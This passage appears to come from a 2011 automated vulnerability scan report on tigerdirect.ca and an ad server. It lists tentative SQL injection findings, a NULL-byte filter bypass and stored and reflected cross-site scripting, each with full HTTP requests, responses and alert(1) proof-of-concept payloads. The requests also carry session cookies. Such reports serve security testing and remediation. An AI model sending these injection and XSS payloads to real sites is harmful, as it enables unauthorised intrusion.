Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 50501
Content-Type: text/html
Expires: Fri, 30 Sep 2011 12:30:39 GMT
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&CaptchaOutVal=&msProduct=1782290&msRandX=44%27+and+1%3D2%2D%2D+; path=/
Set-Cookie: Warranty=; expires=Sat, 03-Jan-2009 13:31:38 GMT; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=596c7%250d%250aef0438428a3; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


<html>
<head>
<title>Order Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="TigerDirect.com is your complete o
...[SNIP]...

1.19. https://www.tigerdirect.ca/secure/orderlogin.asp [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.tigerdirect.ca
Path:   /secure/orderlogin.asp

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /secure/orderlogin.asp HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:28 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 43316
Content-Type: text/html
Set-Cookie: DB=msRandX=44%27+and+1%3D2%2D%2D+&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=%5D%5D%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


</form>
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="1;URL=/sectors/nojs/index.asp">
</noscript>
<script Language="Javascript">
function addToCart(h2fsku, sku, qty) {
var
...[SNIP]...
<a href="http://www.tigerdirect.ca/sectors/bugreport/?errorURL=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgisec%2ForderWarranty%2Easp" target="_blank">
...[SNIP]...

Request 2

GET /secure/orderlogin.asp HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:29 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 50483
Content-Type: text/html
Expires: Fri, 30 Sep 2011 12:30:29 GMT
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&CaptchaOutVal=&msProduct=1782290&msRandX=44%27+and+1%3D2%2D%2D+; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: Warranty=; expires=Sat, 03-Jan-2009 13:31:28 GMT; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=%5D%5D%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


<html>
<head>
<title>Order Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="TigerDirect.com is your complete o
...[SNIP]...

1.20. https://www.tigerdirect.ca/secure/orderlogin.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.tigerdirect.ca
Path:   /secure/orderlogin.asp

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /secure/orderlogin.asp?1'=1 HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:15 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 43346
Content-Type: text/html
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&CaptchaOutVal=&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44%27+and+1%3D2%2D%2D+; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&Referer=%5D%5D%3E%3E&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Cache-control: private


</form>
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="1;URL=/sectors/nojs/index.asp">
</noscript>
<script Language="Javascript">
function addToCart(h2fsku, sku, qty) {
var
...[SNIP]...
<a href="http://www.tigerdirect.ca/sectors/bugreport/?errorURL=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgisec%2ForderWarranty%2Easp" target="_blank">
...[SNIP]...

Request 2

GET /secure/orderlogin.asp?1''=1 HTTP/1.1
Host: www.tigerdirect.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 30 Sep 2011 12:31:16 GMT
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Content-Length: 50483
Content-Type: text/html
Expires: Fri, 30 Sep 2011 12:30:16 GMT
Set-Cookie: DB=msRandX=44%27+and+1%3D2%2D%2D+&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&CaptchaOutVal=&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=%5D%5D%3E%3E; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Warranty=; expires=Sat, 03-Jan-2009 13:31:16 GMT; path=/
Cache-control: private


<html>
<head>
<title>Order Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="TigerDirect.com is your complete o
...[SNIP]...

2. Cross-site scripting (stored)

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /applications/searchtools/item_upsell.asp

Issue detail

The value of the DB cookie submitted to the URL /cgi-bin/order.asp is copied into an HTML comment at the URL /applications/searchtools/item_upsell.asp. The payload 45303--><img%20src%3da%20onerror%3dalert(1)>ee996b5153 was submitted in the DB cookie. This input was returned as 45303--><img src=a onerror=alert(1)>ee996b5153 in a subsequent request for the URL /applications/searchtools/item_upsell.asp.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

GET /cgi-bin/order.asp?EdpNo=1104495&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128 HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4445303--><img%20src%3da%20onerror%3dalert(1)>ee996b5153; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; SRCCODE=CANW; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&

Request 2

GET /applications/searchtools/item_upsell.asp?EdpNo=1104495&msg= HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&; CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51; SRCCODE=CANW; CartSave=CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51&Cart=2

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:29:09 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANW; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4445303%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eee996b5153; path=/
Set-Cookie: SRVR=WEBX14%2D03A; path=/
Vary: Accept-Encoding
Content-Length: 75544


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--DB(msRandX) :4445303--><img src=a onerror=alert(1)>ee996b5153-->
...[SNIP]...

3. Cross-site scripting (reflected)
There are 488 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cc21"><script>alert(1)</script>5b35710a4ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.03cc21"><script>alert(1)</script>5b35710a4ec/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.03cc21"><script>alert(1)</script>5b35710a4ec/5330.1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.2. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e15d7"><script>alert(1)</script>053fcfd23f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1e15d7"><script>alert(1)</script>053fcfd23f1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1e15d7"><script>alert(1)</script>053fcfd23f1/1959687/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.3. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26556"><script>alert(1)</script>dbb612cc67a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/195968726556"><script>alert(1)</script>dbb612cc67a/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/195968726556"><script>alert(1)</script>dbb612cc67a/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.4. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c638a"><script>alert(1)</script>d0630b63a7e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/1959687/0c638a"><script>alert(1)</script>d0630b63a7e/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/td.TigerCanada/Homepage_728x90;sz=728x90;ord=5581649541854?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=NOID; OptOut=we will not set any more cookies

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 285

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtechus.com/addyn/3.0/5330.1/1959687/0c638a"><script>alert(1)</script>d0630b63a7e/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];adiframe=y">
...[SNIP]...

3.5. http://adserver.adtechus.com/adiframe/3.0/5330.1/1959687/0/225/ADTECH [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /adiframe/3.0/5330.1/1959687/0/225/ADTECH

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2931"><script>alert(1)</script>55800ca2451 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5330.1/1959687/0/225f2931"><script>alert(1)</script>55800ca2451/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group] HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
